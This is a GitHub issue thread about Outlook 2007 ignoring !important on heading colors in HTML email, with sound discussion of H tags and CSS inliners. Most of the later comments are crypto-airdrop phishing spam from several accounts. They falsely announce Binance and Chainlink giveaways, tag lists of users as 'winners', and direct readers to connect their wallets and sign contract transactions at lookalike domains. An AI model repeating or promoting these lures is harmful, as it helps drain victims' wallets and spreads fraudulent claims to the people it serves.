### ISSUE TITLE
!important 

### ISSUE THREAD

**Issue by kayluhb** [seanpowell/Email-Boilerplate#14]
I have found that !important is getting ignored by outlook 2007 when applying color to h1-6 tags.  The apparent workaround is to just declare the color twice, which should work fine with hotmail.

```
color:black; color:black !important;
```

I haven't seen this mentioned anywhere, but I haven't looked that hard either, so feel free to ignore this if I'm overlooking something.

**Comment by revelt** [comment]
I code emails for living and I never use H tags. What are the benefits of H tags anyway? SEO — none in email. Accessibility — maybe, but hidden text and ALT tags is the way to improve it. Semantics — it's not of a concern either when whole HTML is full of table layout.

**Comment by bago** [comment]
@revelt how does H tags relate to this topic? Also, before we talk about benefits of H tags, what are the problems with H tags?

**Comment by revelt** [comment]
@bago H tags are this topic, please re-read the first message from kayluhb:
> ...when applying color to **h1-6** tags

The problems are email software will try to change font-size, line-height or both, and differently across different software. This means, you have a liability — you never know how the next webmail update will distort your heading. On other hand, using simple text is always reliable, just use font-size, line-height (with mso- fix) and padding on TD to space it.

**Comment by bago** [comment]
In italy we have a webmail that strips any STYLE, either inline or not. So in this case if you use h tags the recipient see big titles, otherwise everthing will be styled the same. And some webmail add styling for "*" so you have to override the styles for most tags anyway if you want to keep consistency.

I suggest using an inliner that doesn't inline "!important" while inlining the styles in the correct order depending on the presence of the "!important" (e.g: Litmus Inliner or Automattic Juice after my recent patches).

**Comment by revelt** [comment]
> webmail that strips any STYLE, either inline or not

that's hardcore!

@bago Good job on juice!

**Comment by luispurizacam** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @stjordanis, @liangsuifengc, @binarygalwalkin, @sharkrice, @PhyrexTsai, @That1bull-BK, @cangSDARM, @KevinChen9117, @victorvoid, @netpyoung, @naripok, @dillondaudert, @liondani, @devlee, @MagicLike, @trhura, @meabed, @janhohenheim, @network-alchemist, @c055, @idimitrov07, @brancusi, @maxmersch, @asifrpatel, @bcgameProject, @relengxing, @adamstallard, @earthbound19, @chenko515, @melusi-k, @notjulian, @yqrashawn, @tomquas, @satarii, @IldarFatikhov, @metametadata, @filipeoliveiraa, @kdama, @alexfdz, @Taurusu, @willzhuang, @dwgeneral, @Vraggosudarstvu, @slumber1122, @postzavtra, @Tre2Turnt4Tyme420, @bitcard, @weixuefeng, @oleg, @orangemio

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @jjyr, @ckwanted, @oparkins, @skylightxo, @svpplyit, @paveli, @0xcode46ash, @virtualrobotix, @yxliang01, @AlexAltea, @JeremieWU23, @kakalid310, @thodges-gh, @kongxueping, @ChuangLiu727, @MehdizadeMilad, @decart-hub, @MrChens, @Davi0k, @Redgvng, @SamLottes, @kirushik, @hrishikeshio, @AAH20, @tusuii, @Mingliang233, @Ladonna71999, @LimitlessFavour, @JithinKS97, @Lobster070, @PanPanda, @Hirama, @gin, @shrugs, @guoyuqi020, @simsieg, @yaelahtom, @ohhkaneda, @ngmisl, @chrisaxiom, @bgxdoc, @iacomus, @Watch996878, @zoowii, @LuaxY, @gavinyue, @Jusharra, @lqdflying, @luca590, @somethingnew2-0
